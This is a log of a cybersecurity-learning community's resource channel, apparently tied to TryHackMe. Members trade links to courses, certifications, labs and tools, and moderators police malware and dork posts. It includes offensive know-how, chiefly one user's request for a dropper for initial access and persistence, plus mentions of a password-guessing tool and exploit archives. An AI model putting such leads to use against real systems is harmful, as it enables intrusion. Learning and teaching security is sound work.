#resources
1 messages ยท Page 2 of 1
Does anyone know of a good online CompTIA A+ course?
The official one maybe? Haven't done it
https://youtube.com/@professormesser
Professor Messer has the CompTIA A+ course.
Thank you
Gave +1 Rep to @simple juniper
Paul browning has the full course on yt
We don't help with schoolwork.
@ornate lichen free, publicly available book on Intel assembly language http://www.egr.unlv.edu/~ed/x86.html
@keen elbow https://institute.sektor7.net/
Chief Research Officer at SEKTOR7. In the industry for over 20 years. Worked in global Red Team for almost a decade. Simulated threat actors targeting IT infrastructure across various industries (financial, technology, industrial, energy, aviation) around the world. Speaker at HackCon, PWNing, WTH@ck, Sec-T, T2, DeepSec. Gave guest lectures at s...
What book would you recommend to get started in cybersecurity and hacking?
Security + by Mike Meyers is a good one
mike meyers is such a good teacher.
He really is! Love all his material
https://academy.tcm-sec.com/courses/
Practical Ethical Hacking (This is one going free right now), so if any beginner wants to enroll, here they can
Completed up a handful of certifications and wanted to reflect so I wrote this 'guide' - tips and tricks, getting certified on the cheap, my experience, and some thoughts on the CompTIA Secure Infrastructure Expert stack - also that poll on getting the CISSP https://www.allowsomedenyall.com/2023/04/comptia-secure-infrastructure-expert.html
Any CEH study groups ?? Pls reach me @daring blade
Hey folks! I am starting something new: https://github.com/DMaroo/GhidRust. I'd love if people could suggest new features, contribute to it (that'd be really awesome, thanks) and test it (once it matures).
GhidRust is a WIP Rust decompilation plugin for Ghidra, which dreams to be the one and only stop for any sort Rust binary analysis required inside Ghidra. As of now, it can detect Rust binaries, apply std library's function signatures and do very basic decompilation (still buggy).
Iโm not an expert on Ghidra or anyone important but I do agree that decompiling Rustlang binaries is alien-language because weโre so used to C/C++
Agreed. The lack of any sort of Rust specific reversing tools is just astonishing. I hope that the Rust reversing ecosystem evolves and matures (like that of Golang, for example).
do we have latest discount voucher for thm premium subscription?
There was one emailed to A/B users a few weeks ago.
wait go has rev tools?
Yup. In fact Ghidra itself has a bunch of Go extensions like gotools and ghostrings.
I wanna learn go lowkehv
Can someone recommend me some resources about c2 server + deployment and things about it?
Hi, discussion of these topics is locked down to specific channels with access requirements, please don't ask here
Can you provide link to these channels?
They have access requirements
what are the access requirements for all of the advanced channels etc, is it level based?
like is there numerous advanced channels or is it just level 13 or certs?
Rank 0xD, completed OSCP, Throwback or be in a top field infosec job, IIRC.
Ty
Hi, I would like to extend to @junior hearth question, I'm having issue running Starkiller+death star or even starkiller_powershell for Throwback. I would love to have some recommendations for any alternative tools. I have tried to use the cs server from Rasta mouse, but I was not able to make it worked.
I asked them to avoid asking those questions here.
It seems your question is directly related to the tryhackme throwback network?
Hey guys, I've been thinking about migrating the Host OS of my laptop from Windows to Linux and am looking for good resources/guides on the best method for doing this. Any recommendations?
It's not that difficult, I think the hardest part is choosing which distro of Linux you'd want to use, have you given a thought?
@stuck abyssYes, I've used DistroChooser to narrow down some options. It suggested Devuan, Rocky, and Debian. I've also been interested in Arch
Arch is one I don't touch because I've always broken it.
Debian could be a good start.
I've only tried Mint, Ubuntu and Kali (I don't daily drive kali. and won't suggest you do it either)
I've run Mint before in the past on a VM. It was okay, however I didn't really like the UI. I probably will go with Debian.
pick a distro based on your use case
if you want a linux desktop or daily driver, i'd recommend something stable-ish, but not necessarily as stable as centos or rocky. if you want to set up some enterprise-like boxes, LTS is the way to go.
@jagged tiger It'd be for the purposes of having a linux desktop. Using my laptop is uncommon, but I'd like to have a dedicated device with linux as the host OS to experiment with. My primary desktop is Windows
And while I could continue using a VM on my primary desktop, I want the experience of using linux on metal. I believe VM's don't offer the same feeling
I would recommend Ubuntu or Fedora - if you want newer features, the 6-month release of Ubuntu is fine. If you intend to use it for schoolwork or actual work, you may want something more stable. Like Centos or Ubuntu LTS. You could go down the route of a less common distro as well, but part of the reason the RHEL upstreams and Ubuntu are popular is because there are pretty large and knowledgeable communities available for help
I could get down with either of those. When it comes to migrating, are there any good programs for taking snapshots in case I want to revert to my Windows OS?
Don't nuke the factory recovery partition
And 'reverting to your old windows' won't really be possible, as you're either rewriting the partition table or you are over-writing the original windows partition.
If anything, I would recommend you get a recovery ISO and key from the desktop maker.
Thank you for your advice, I appreciate it. Can you point me in a direction where I can learn a little bit more about how to format my drive and where to go after that?
Thank you. I have got help with the issue from throwback channel ๐
Gave +1 Rep to @odd quest
https://www.phind.com/ Like ChatGPT but has access to the internet and cites it's sources
Anyone knows a good resource of utilizing sleep based sql injection?
Portswigger!
https://portswigger.net/
Very good site for web hacking !
Dive into the world of penetration testing with this comprehensive guide by cybersecurity expert, Brandon S. Keath. Explore each stage of the Penetration Testing Execution Standard, learn essential tools and techniques, and gain insights from real-world examples. Master the art of ethical hacking and become a skilled penetration tester.
Hello everyone;
A program to change ip address with tor written in python2.7 2 years ago. I have rewritten it for python3.x versions under the name of PrivacyNet and shared it on my github address. You can access the vehicle from the link below.
https://github.com/HalilDeniz/PrivacyNet
@still lark Please ask before posting content on malware
Oops sorry
Can I post it here ? , I am giving awareness about Malware
Malware discussion is restricted to the advanced channels #start-here
OK , Thank You ๐
AI-based Password Guessing tool: https://github.com/D3vil0p3r/PassGAN
hashes.org doesn't exist
@odd quest
:hammer: -หห เผป๏ผฏ๏ฝ๏ฝ๏ฝเผบ หห-#8899 has been banned.
Sorry was 4am for me when I was tagged & sleeping.
I'm New in TryHackMe,can
Anybody elaborate the streek freeze?
If you have a streak freeze for 1 day.
And you answer a question on Friday, Saturday.
Then Monday rolls around, and you forget.
The streak will freeze.
If you answer a question on Tuesday, your streak will +2.
Hi, I'm going to work on threat intelligence. Can you suggest any interesting websites to me? such as where to begin...
๐
hes just reverse image seraching
they have no osint knowledge
i have lucidsint
about 20x better than them stuff they used there
Who asked though?
no one
Fr
prob any.run, virustotal, virtualbox maybe, google cloud, replit cloud, joesandbox etc
im not very good at threat intel
i dont focus on threat intel much
Can u give me some of OSiNT if u use any ? And thank you so much ๐โค๏ธ
Gave +1 Rep to @steep spruce
:hammer: $ Lucid#8994 has been banned.
They have a blackhat tool in their bio
Oh I see
And I'm pretty sure I've banned them before for trying to doxx community members
We appreciate that my friend thanks a lot ๐ซกโค๏ธ
@swift saddle has been warned.
Thanks! :))
Gave +1 Rep to @fringe spire
Please don't post huge walls of text. If you have a resource you found that's useful, please just post the source and not 30 pages of links.
I think that's just the beginner free path?
oh ok i will remember this. deleting now
@zealous remnant Donโt post google drive links here please
just curios, whats wrong with them?
For security and safety
what might happen with a google drive link?
it's due that some can share some bad link
Is this a referral link or do you otherwise gain anything from it?
@sturdy shell
@sinful crag has been warned.
For the bros interested in Solidity and Smart Contract Security/Auditing
https://github.com/razzorsec/AuditorsRoadmap
Is there somewhere that I can find a document with all of the steps in the cyber kill chain detailed with the different tools that can be used for each step? For example enum4linux and linpeas are different options for enumeration.
I'm not sure if there is such a resource (aside from building your own), but the closest I can think of is this - https://www.amazon.com/RTFM-Red-Team-Field-Manual/dp/1075091837
Over 8 years ago, the Red Team Field Manual (RTFM) was born out of operator field notes inspired by years of Red Team missions. While tools and techniques change, operators still constantly find themselves in common operating environments, with time running out. The RTFM has provided a quick refe...
Thank you for your help!
Gave +1 Rep to @brave harbor
Hey team, i was hoping someone could make a recommendation on a stage 0 dropper/shell manager to use. I am not looking for a C2 with a full suite for post-exploitation but more for initial access and persistance.
https://github.com/watchdog2000/py-de-fuscate - a malware analysis resource for files obfuscated with pyfuscate
Can someone please recommend some cyber books?
Sparc Flow has a bunch of books a that are awesome, they are a series. He takes you through realworld exploits while making the reading engaging.
Hi, I'm looking for resource so I can be really sharp within networking pretty much everything I need to know for hacking and what not. Anyone has any resources I can use or direct me to a course/site?
So networking or hacking? Studying networking is an entire field in itself. If you want to simply begin to become adept in the type of networking you generally need to know, in order to hack networks then THM's Network Services module is a good place to start. From there I would utilize someone on YouTube named professor Messer. If you're ever confused about a concept he can clear things right up
suggest me some practical books of Hacking or some resources plzz
The Hackers Playbook
Various Linux tools
Would network+ teach me what I need to know for networking or is there another resource that's better
I'm not taking the actual certificate just using it as a structured learning path
How deep do you want to go?
Just learning the concepts or looking to configure switches/routers as well?
For basics network+ as a learning path is good enough
It's easy as well as there are ton of free resources/courses online and on YouTube for Network+
Free 12 week course How to Learn Rust https://learning.accelerant.dev/how-to-learn-rust
Thanks
Gave +1 Rep to @remote wind
Do anybody has ec council courseware for ECSS or CCT certification
https://github.com/Orange-Cyberdefense/arsenal - Not my own project but maybe people here could make use of it?
https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg <- mind map for AD pentesting
Pure gold, thank you
Hi. I'm probably not asking in the proper channel, but does anyone have experience preparing VMs for upload to a tryhackme room? I'm creating a room for the capstone project and there just isn't much documentation on what they expect for an uploaded box...
!docs room-creation
@shut ferry โฌ๏ธ should be a good start
This is what we're using for the pentest+ prep class I'm taking and it's been pretty great so far, lots of resources within.
Thank you I'll check it out.
Gave +1 Rep to @sudden fern
no problem
Man why isn't this more prominently displayed with the development tab in thm? This is great thank you ๐
Does anybody know what happened to the "my machine" page where you could deploy a Kali box not attached to a room?
Hello @sudden fern? Can I ask another question real quick ?
How can I (Account-Take-Over) any Accountย ? (2) https://medium.com/@ozomarzu/how-can-i-account-take-over-any-account-2-9533d54bc33e
Deprecated a while ago.
The attackbox/kali aren't attached to rooms, deploying it in one allows access from any
sorry for late reply but shadow was sleeping... so how can shadow help if you have not solved it yet???
Gave +1 Rep to @sudden fern
It's a well-known fact that shadows need sleep too!
I have not figured out my problem, despite working on it until my brain became mushy yesterday
It would probably be easier to explain specifically what's going on in a DM, if that's okay with you. I'm not trying to muddy up the channel too much. If not though, I'll happily muddy it up to meet my own needs lol
@zinc silo Hey, discussion of Google Dorks is okay within reason but please refrain from posting dorks to find vulnerable websites here ๐
Hey guys, quick question for anyone that might have some advice. If I just started and want to get a book or two to read, which ones would you recommend? I have a basic understanding of programming from my electrical engineering curriculum, but thats about it
to fell a tree
jeff jepson
ISBN 978-0-615-33879-8
why this book specifically??? it is extremely good at teaching how to write and provide good learning content meaning it can teach you how to show your progress and methods in an easy to understand matter
and a bonus is you will learn a skill most hackers don't have
maybe one related more to cybersecurity?๐ @sudden fern
well report writing and getting points across is important in all of cyber security but sure
Black Hat Ruby: Offensive Ruby programming for Hackers and Pentesters
thanks!
https://youtu.be/KPd-ct3Fkg0
If anybody is interested in automating your google dorking and making your own search engine https://programmablesearchengine.google.com/about/
I want to start off by saying apologies for my horrible speech lol but in this video I teach you how to make your own engine using googles programmable search engine to automate your social media searches and hashtag searches.
๐ ๐ฅฒ
Anyone has any good free courses or resource for learning the basic of computer components. Like (CPU,RAM) and everything else. Also is it recommended to learn more about computer architecture when learning more about hardware?
the comptia a+ probably covers most everything you need to know at a basic level
+1 for professor messor
Hi, I want to join THM site and has come to my attention there are 20% off referrals codes. Anyone can help me out with that? 
I'm not aware of any referral codes? Just the 20% student discount?
this might be better asked here: hey all Im looking for studying tips. Im going thru all the "easy" courses to get caught up on the basics. Do you write things down w/pen&paper while you go thru the material? are you typing it out in a note taking app (app?)? or do you just blast thru the, like I am lol? thanx
I use obsidian to take my notes. There are several note taking apps you can try. I'd suggest that you take notes of everything you've learnt for the first time so you can refer back to it later when you encounter the same challenge and you need help.
Taking notes is quite important. ill say even to prioritize it. taking notes is can save lots of time
I've not been taking notes at all until very recently and it's definitely helping. I also am forming a cheat sheet of sorts with a bunch of basic commands for various software we use
Blasting through without taking notes is a bad idea. The amount of knowledge to be learnt is infinite and you'll never memorize it all. Otherwise, you'll be wasting valuable time searching google when you encounter a challenge that you've done before but forgotten how to do. The better your notes are the more efficient you'll become at hacking. I would recommend noting in a digital format which makes searching faster and it's easier to reorganize everything as sections grow and warrant sub-headings. I originally started taking notes on my phone with One Note and I'm now converting all my notes into Obsidian because the amount of notes grew to such a stage I noticed it was slowing me down while trying to find things in One Note. After discovering Obsidian, I really regret not having migrated to it sooner.
@latent kelp Thatโs not a resource?
@simple juniper thank you!
Gave +1 Rep to @simple juniper
@hard solar thank you
@vapid root thank you much!
Great advice everyone. Ive begun taking notes on my studies using office word. Using the first three headings options seems to organize everything pretty well for now. Definitely going to check out obsidian today. Again, thank you everyone
Check out notion! Obsidian is the competition of notion, most say that it is somewhat better. They do have a ai that you could use in the app and collaboration system and allot more. Haven't tried Obsidian but I am using notion
looking a resource's for bug hunting and computer science & web hacking for a bug hunting
Look at the pins in the bugbounty chat
thanks
Gave +1 Rep to @flat falcon
I got a virtual machine with web server configured. I need to find vulnerabilities in it and report it.
So i am looking for some resources to write a report for that since I don't have experience writing reports.
Thanks in advance
Hi! I've recently upload this post about a homelab to study the eCPPTv2 certification. Because I don't know in which channel upload it, I am going to send it here. Hope you ejoy!
kk
hai
yo, the shodan room is fixed and so is my blogpost ๐ (the images pointed to a broken URL. Fixed them ๐ )
https://skerritt.blog/shodan/
https://tryhackme.com/room/shodan
Learn about Shodan.io and how to use it for devices enumeration - is your coffee machine publicly accessible?
Does anyone have any good resources for learning Python a little better? Preferably free, or low cost. I would like something that starts with the basics and has exercises where I can actually test my knowledge. I downloaded a couple of apps but they're like Duolingo of Python and are too easy...not enough ways to actually apply the learning, only very very easy multiple choice questions. Thank you!!
New programmers often need small projects to work on as they hone their skills. This is a list of project ideas that beginners can tackle.
Also checkout the pinned messages in #resources
Kattis was missing from that list, that was an interesting one
Thanks!
Gave +1 Rep to @sonic abyss
@brazen sequoia
@pale gull Please don't make posts like that here ๐
Does anyone know any good resources for Rust coding and security standards.
@finite patio Please post the course link, not a link to YouTube on how to claim the course ๐
A lot of mindmaps to help you navigate the cybersecurity universe:
https://github.com/Ignitetechnologies/Mindmap/tree/main
Also hereโs a bunch of networking cheat sheets:
Thanks!! Some of that is going to be super helpful ๐
Gave +1 Rep to @untold nebula
Would individuals appreciate a list of play books for all the common services/basic enumeration? Maybe with some automatic scripts to help enumerate
The Firefox extensions mind map here help me find some useful stuff
for those interested i shared my obsidian vault on github, it's public and most of it's redacted but every plugin and style still is maintained ๐
https://github.com/NicoBouquiaux/LYT-Kit_Redacted.git
hihi if you are looking at making an open source project I updated my article on my tips for it. i follow this formula myself and its worked for me, hope someone else finds it good
tl;dr - your readme / design is a lot more important than most people think ๐
Cyber Security Body of Knowledge, a comprehensive body of knowledge to inform & underpin education and professional training for the cyber security sector
From the university of Bristol in association with NCSC
Request for resources: Setting up an Nvidia GPU on a Linux server with no GUI for CUDA support (even more so for the GTX 2060) with PyTorch
I have followed quite a few guides and they either assume I have a GUI so I can click through an app, or it's not quite right ๐ฆ
IIRC nvidia drivers on linux require xorg to installed? It's been awhile
I managed cuda headless without too many problems but not pytorch
Is this your home environment? Happy to help in DMs etc
Proprietary ones definitely don't, my cracking rig doesn't have xorg afaik
yes my home environment, I am trying to mary https://github.com/paperless-ngx/paperless-ngx and https://github.com/PromtEngineer/localGPT
Do you know what Nvidia drivers you got? Are they GPU specific? The ones I'm installing look to be specific to something haha
ssh autumn@XXXXX
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Now I can't SSH in for some reason what a fun time 
I love homelabs because you try to do something and everything breaks and its just a case of doing my job outside of my job to fix everything
Proprietary direct from nvidia iirc?
20 series is new enough that it should still be supported
what a way to learn that nvidia has first party driver support, i am still living in 2010 apparently 
do you not have nvc++ installed? Last time I did CUDA on linux ( ~6 years ago) xorg had some library that was a dependency
Hmm
Like a 2-3gb download still though?
yeah, the CUDA libs themselves are pretty huge
I am not saying they have caused this, but I tried to set up a HP printer with its silly software and now I no longer have public / private keys on my machine....
What is the name of the site that has an archive of exploits?
lmfao if this is the one I am referring to I am so sorry for asking lol
I can't check rn cause my work firewall has it blocked. but in my defense it was a couple years since I last needed it hhaha
there's vulners too
hello. I am looking for Web Application CTFs styles of challenges whereby I can practice techniques such as XSS, CSRF and SSRF etc.
I've done the burp modules, tough I find them too theoretical. I've also completed the pwnCollege module which we're more my kind of thing.
best regards.
Owasp juice shop And PortSwigger Academy labs
Although very different, both can help you practice, and are free
does anyone know free iOS emulator for windows?
As this tool has a lot of unethical potential uses that are very low hanging fruit, I would ask that you not advertise it here.
Use ChatGPT anonymously without registering an account, for free.
What's the catch? It's using gpts paid api and not storing queries, how is it making money?
I don't know how they make money but it saves login time to make some quick queries.
I don't think this is really fitting content for this channel ๐
Works on my machine
Eh, discord bug
That's the image below that I posted that's spinning
Discord bug.
Ctrl and R might fix it.
Take alot of screenshot on Windows, and want the time stamp to feature on the command prompt or powershell?
###create a powershell profile, if it doesnt exist already
New-Item $Profile -ItemType file โForce
##open it in notepad to edit
function prompt{ "[$(Get-Date)]" +" | PS "+ "$(Get-Location) > "}
##risky move, need to tighten this up. Change your execution policy or it won't
#run the profile ps1
#run as powershell admin
Set-ExecutionPolicy RemoteSigned
Command prompt
setx prompt $D$S$T$H$H$H$S$B$S$P$_--$g
is it ok to learn from teh book which has reputation but its from 2008 -2012
i don't think fundamental change that much over time, whats is the advice ?
I have some older networking books that I have used to read about basic protocols and concepts that haven't changed. Just know that the info might be outdated and you should follow up with something more recent to ensure the info you know is up to date, if that makes sense.
Depends on which one. Plenty of them can still somewhat be relevant
Anyone that is a FL resident and over 18 and just getting started trying to get into the field might be interested in this: https://cyberskills2work.org/i/pathway/10121/detail (full disclosure, I just saw this on LI and thought I would pass it on, I know nothing else about the program except it's free and you should be able to do CYSA+ at the end)
Cleared my CRTE exam few days ago. Wrote an blog for its review and preparation guide along with my notes. Hope it helps anyone who is preparing for it.
https://0xstarlight.github.io/posts/CRTE-Exam-Review/
The $5 Membership sale is now live! The sale lasts until July 17 23:59 UTC: https://t.co/0iqiq2vTpn
1000
597
https://youtube.com/@BranchEducation
Brilliant channel
How do Microchips work? How does your smartphone camera work? How does Bluetooth work? At Branch Education, we dive deep into the science, engineering, and technology in our modern world using 3D animation and incredibly detailed models.
Founder of Branch Education: Theodore J Tablante
Want to support in-depth engineering and technology ed...
I totally agree
Little tool I made, would be great if I could get some feedback ๐
https://github.com/RyanDodd21/GaTS/tree/main
PrivEsc and Enumiration script/tool downloader for windows + linux
feel free to suggest additional tools
guys, can you recommend some infosec news sources like newsletters, blogs etc. to be somewhat up to date?
dark reading
full disclosure
packet storm
threatpost
all of these have rss feeds too
thank you!
Gave +1 Rep to @sudden fern
no problem
generally some more general stuff news sources post about things like this too
like bleeping computer and ars technica
I've noticed for a lot of beginners they tend to not know any starting point on how to take notes, hence why i publicised a public repo of my redacted obsidian vault, which can be customized to your needs. Hope it helps new beginners on getting straight away started on taking notes while learning:
https://github.com/0xSoundOfSilence/LYT-Kit_Redacted
heh it's your opinion I guess
the creator of the room is also the creator of haiti
personally I find haiti better. everyone uses whatever they want at the end of the day
๐
map of top 5000 sites and services, by favicon with the biggest favicons being the most popular
Does anyone know how I can set up a vulnerable server just like the one THM is using in the Burp Suite Room? I want to practice more penetration testing stuff on it. ๐ Thanks
Yes. We need this
What sort of server?
Either a bank or crypto vulnhub VM at least for me
I can build the web app if necessary just donโt know how to make a vulnhub server
hello people will you have the name of a blog which is represented as this site (exactly the same) but in English? it's a known blog but I can't find his name lmao. It bundles all the good cyber security resources for information
List of useful wiki like sites
I found this blog on **Some common Steganography tools for CTFs** and it is for extreme beginners in CTFs.
This writeup consists of the information which I found very useful as a complete beginner.
https://medium.com/bugbountywriteup/some-common-steganography-tools-for-ctfs-92e3de93f141
Is there a site where I can stay up to date about everything in pentesting ? Also about how AI is being used in cyberโฆi assume there are alot of AI tools that make life easy for pentesters, SOC analysts etc
Hey guys, in my journey learning bash scripting i have made a very dirty (stupid) subdomain enumeration tool. Maybe you will get something out of it! https://github.com/Luke57/subseeker/
I think this has been posted before but,
https://www.phind.com/
Basically free access to GPT4 + Tells you the sources + Can change website rankings - I've found it really helpful so thought it'd be worth posting
Get instant answers, explanations, and examples for all of your technical questions.
I don't understand, but here is a directory of vulnerable instance made by owasp:
https://owasp.org/www-project-vulnerable-web-applications-directory/#
hi guys... does anyone have resources for learning tcpdump and Wireshark?
THM has a few wireshark rooms.
thanks bro
Gave +1 Rep to @stuck abyss
https://youtu.be/EHp4FPyajKQ
Finally made it click watching this
Get a free audiobook and a 30-day trial of Audible (and support this channel) at http://www.audible.com/upandatom or text "upandatom" to 500 500 on your phone.
Hi! I'm Jade. If you'd like to consider supporting Up and Atom, head over to my Patreon page :)
https://www.patreon.com/upandatom
Subscribe to Up and Atom for physics, math and comput...
Gave +1 Rep to @mystic siren
Hey guys , i'm going to do a telecommunications networks license at university and I want to take a little advance, are there any introductory courses to advise me?
Maybe have a look at Professor Messners Yt-Channel
Thereโs this one too https://blog.tryhackme.com/free_path/amp/
Where did you get these rooms? A lot of them are private
they are always there dude
Well, CC Pentesting for example, that's an extremely outdated and retired room
I don't understand the fuss behind TLDs like these, they are the exact same as any other one (like .tech or .com or .org)
Would you mind explaining your reasoning behind it? I'm just generally curious if I'm missing something
You realize that the domain name has nothing to do with downloading things?
sure
ya, exactly
well, there's nothing you can do about it if you don't have knowledge about how domains really work. We post papers with incredible subjects and techniques, it's up to the reader if he wants to or not.

@unique crown you deleted all messages lol ๐คฃ
Found this awesome description of the RSA Algo
https://www.youtube.com/watch?v=Pq8gNbvfaoM
In this we discuss RSA and the RSA algorithm. We walk our way through a math example of generating RSA keys, and then proving the ability to encrypt a message with one key and decrypt with the other (in both directions).
We show you how RSA uses prime numbers to create keys and encrypt/decrypt messages. And discuss how the Security of RSA lies ...
๐ Hack Me, Test Me, Crack Me! ๐ป๐ฅ
๐ Seeking the eJPTv2 Certification ๐
Hey! Buy me a coffee โ and support my quest to conquer the eLearnSecurity Junior Penetration Tester v2 (eJPTv2) certification. Your contribution will help me unlock the skills to safeguard digital fortresses! ๐ก๏ธ๐ช
[!]๐ Grab a Coffee & Show Some Love: https://www.buymeacoffee....
Hey,
I have a Windows application that I need to reverse engineer and identify vulnerabilities within.
I've opened the folder with dotpeek and there are lots of dlls and I need some direction what to look for.
I'm looking for some tips or a link to a good source to learn from.
Thanks.
This is a top level view of the dlls:
You have www.vulnhub.com where you can exploit everything you want
@graceful hawk Code seems to not work, and we don't really want to advertise paid content in here ๐
One question.
As a hacker is it better to know how "raw coded" things work, or use libraries that makes it easier. Say a hacker will use web socket to make something in realtime, will he use a library for that or just use a protocol/built in modules to do the job(Maybe the worst example).
Understand how it works at the lower level, then use a library to quickly get it done
https://youtube.com/watch?v=q3-xCvzBjGs
cool video for slow people like me
Learn JavaScript ๐https://learnjavascript.online/?utm_source=specex
React Tutorial ๐https://react-tutorial.app/?utm_source=specex
Learn Programming ๐ https://learnprogramming.online/?utm_source=specex
Learn HTML CSS ๐ https://learnhtmlcss.online/?utm_source=specex
Find out how a typical Spectre attack works in this video that simplifies the cod...
Very cool, thanks for sharing
Hi everyone
I recently wrote an article on Passkeys. They are a new passwordless authentication method that offer a safer and easier alternative to passwords. So if you want to learn more, click on the link below and let me know what you think ๐
https://www.cybersecguidance.com/post/passwords-are-broken-all-hail-passkeys
Hello. I'm looking for a resource I can keep on my attacker VM that is a folder including all or most exploits/scanners that are transferred to windows targets and AD environments. I can make my own but I bet someone already made a git for it somewhere and includes things I don't know about.
Please @ me if you respond to this
Is this new?
https://cs50.harvard.edu/cybersecurity/2023/
Says "Check back in October 2023 for the full course!"
Yeah, just asking if cybersecurity has been a course CS50 has been doing before I'm not sure
It's a new addition to the course
DarkNet Diaries RSS (for youtube)
https://www.youtube.com/feeds/videos.xml?channel_id=UCMIqrmh2lMdzhlCPK5ahsAg
Uma vulnerabilidade, que foi classificada como problemรกtico, foi encontrada em rkhunter Rootkit Hunter 1.4.4/1.4.6. A vulnerabilidade รฉ identificada como CVE-2023-4413.
this is my new cve
im currently doing the soc level 1 path. are there any good books to read about that topic?
Hi , any resource to walkthrough Android Hacking 101?
SOC lvl 1 path is quite broad
Is there any specific topic here you are interested in?
not really im too new to the field
but i search a bit on amazon and i think i found some interesting books
how do you convert a jar or dex file to apk
I have searched a lot online, tried dex2jar, apktool to no success
it was straightforward converting apk to jar but the recompilation seems different
sounds like a pickle, oops i mean onion
The Simple CTF room is outdated because of the exploit was written 5 years ago, here is a little help how to solve/workaround the issue: http://tomsitcafe.com/2023/08/23/tryhackme-simple-ctf-modern-solution-2023-working-exploit-with-docker-io/
this way you don't need to rewrite/convert the exploit, and the console output will be usable
pyenv and virtualenv anyone???
yes your way will obviously work but using the tools intended for using any version of python with a specific script and its dependencies goes a long way
well thinks ubuntu removed that binary by now.... and kali heavily recommends you use pyenv for running python2 scripts
oh I use it directly
Hi , any resource to walkthrough Android Hacking 101 in tryhack me room? Like you tube video walkthrough?
@graceful hawk Please don't post shortened links here
Free course on Linux and Shell Scripting
https://www.udemy.com/course/learn-linux-operating-system-from-basic-to-advanced/?couponCode=97EF644BCE13DC090941
cryptography association
https://www.cryptogram.org/
Please interact with the community before advertising your udemy courses.
Hi hackers, do someone have some really good indepth wapt resourse ?
Have you tried portswigger academy ?
https://portswigger.net/web-security
Hi guys, I may be interviewing some blockchain/crypto companies for a security roles in the near future. Is there any interview questions cheat sheets/tutorials/free online courses on cybersecurity related to blockchain/crypto?
Just dropped a brand-new video where I take you through the essentials of Server-Side Request Forgery (SSRF), demonstrate how ChatGPT can generate SSRF-vulnerable code, and share effective mitigation techniques! ๐
this is fresh, july
A short introduction to beautiful math typesetting on Quora
maths LaTeX cheatsheet
Port Swigger is a great resource, I like how they break the concept down and give you lots of labs
SquareX secures your online activities without compromising productivity
@rough void Can you interact with the community before posting your tools here, please?
not sure if anyone else is curious of Linux kernel dev,
TL;DR you need C
I bought Hacking API book and now there is a video ! (also there is the API academy)
Learn about the OWASP API Security Top 10, 2023 edition. In this crash course, you will learn about each security risk and learn techniques to fortify your APIs against potential threats. The course also covers key concepts that didnโt make it into the Top 10.
โ๏ธ Course created by APIsec University and Corey Ball
Website: https://www.apisecuniv...
DFIR RSS Feed
https://thedfirreport.com/feed/
You might also enjoy this one by Jai Minton:
https://www.jaiminton.com/cheatsheet/DFIR/# ๐ฅณ
thanks
Gave +1 Rep to @craggy onyx
Thanks!
Gave +1 Rep to @craggy onyx
This information is from Cisco's YouTube channel video: The Essentials of CCST Certification
# CCST Cybersecurity
validates's skills and knowledge of:
- cybersecurity principles
- network security and endpoint security concepts
- vulnerability assessment & risk management
- incident handling
- 1st step towards CyberOps Associate certification
- CCST certification for life
- no recertification requirements
Cisco Certified Support Technician: Cybersecurity (there is Networking too)
- cybersecurity technician
- jr cybersecurity analyst
- help desk support
- security operations analyst
## CCST Training
CCST Networking (free e-learning & prep exam)
- network basics
- networking devices and initial config
- network addressing & basic troubleshooting
- network support & security
- network tech career path exam
CCST Cybersecurity (free training)
- intro to cybersecurity
- networking basics
- networking devices and initial config
- endpoint security
- network defense
- cyber threat management
120 hrs to complete
then exam
skillsforall.com > Explore > Get certified > CCST
https://skillsforall.com/resources/ccst-cybersecurity?courseLang=en-US
https://skillsforall.com/career-path/cybersecurity?courseLang=en-US
### Exam
CCST have to use, config diagnose problems, deeper concepts
CCST exam $125 USD, online requires proctor & webcam
50 min exam, must pass exam for cert
CCST Networking exam Topics :
1. standards and concepts
2. addressing and subnet formats
3. endpoint and media types
4. infrastructure
5. diagnosing problems
6. security (subdomains, WiFi, firewalls)
for the Network packet module you need to download Cisco's network software to analyze packets and answer questions
CCST Cybersecurity exam Topics:
1. essential security principles
2. basic network security changes
3. endpoint security concepts
4. vulnerability assessment and risk management
5. incident handling
Pyramid of Pain , from SANS
https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
original link
https://www.sans.org/tools/the-pyramid-of-pain/
View The Pyramid of Pain, built by SANS instructor candidate David Bianco, a conceptual model for the effective use of Cyber Threat Intelligence in threat detection operations.
Very useful website learn cybersecurity or any other computer related field very easy with step by step guys enjoy 
hey, do you guys know of a resource about thc-hydra? I cannot find anything that lists modules, specific options for modules etc
Their github?
Come learn about how to use an software defined radio (SDR) to pick up and signals, and how to identify what they are and what they mean.
search rana khalil in youtube
Vim is a highly configurable text editor that you can use for software development or any kind of text editing. In this course you will learn how to use and exit Vim.
โ๏ธ Florian Dedov from NeuralNine developed this course. Check out his channel: https://www.youtube.com/channel/UC8wZnXYK_CGKlBcZp-GxYPA
๐ Thanks to our Champion and Sponsor suppo...
Any web security labs other than portswigger to practice?
maybe checkout vulnhub , only know about it never tried their stuff
Aside from tryhackme?
seriously why do i even bother to answer people. today onwards i am not going to help.
muted channel
who knows? breaks are important though
https://medium.com/p/4fac9505c23a - Blog post on Imposter Syndrone (Admittedly self-written)
In the world of cybersecurity, where red and blue teams battle to secure the digital frontier, thereโs a sneaky bug that can infiltrateโฆ
Yeah but you just need to realize the true secret, we're all imposters
Hey, noob here. Does anyone know any good resources about the process of recon/ how an experienced ethical hacker would go about recon?
TCM Ethical hacking course could be a great start on this, i guess
Ah thanks!
Hello guys, I'm preparing for CEH exam and so far it's not that good as I am reading the book the EC council have provided. I need any video content about CEH to prepare for it. So if possible please provide me with resources! Thank You
Could you please share a little bit about what course material it covers?
It's is given by ec council so it covers everything that you require for the exam. But as it is a text book it's a bit hard to read and understand
It covers all the 20 modules required for exam
Normally this is supposed to test your knowledge and your ability to research. Best I can do is to wish you luck
Haha ... Thank you
Gave +1 Rep to @hushed estuary
Free Event โ worth checking out. Most interested in the talk on cloud lateral movement & hearing about the next gen of cloud attacks! Also, lots of info on new research & tools to level up your offensive sec game. And personally, donโt know who'd pass up a session with Stephen Sims.
HackFest Summit 2023
November 16-17 | Free Live Online
Details here: https://www.sans.org/u/1qTn
I'm looking to practice exploiting viewstate deserialization vulnerability.
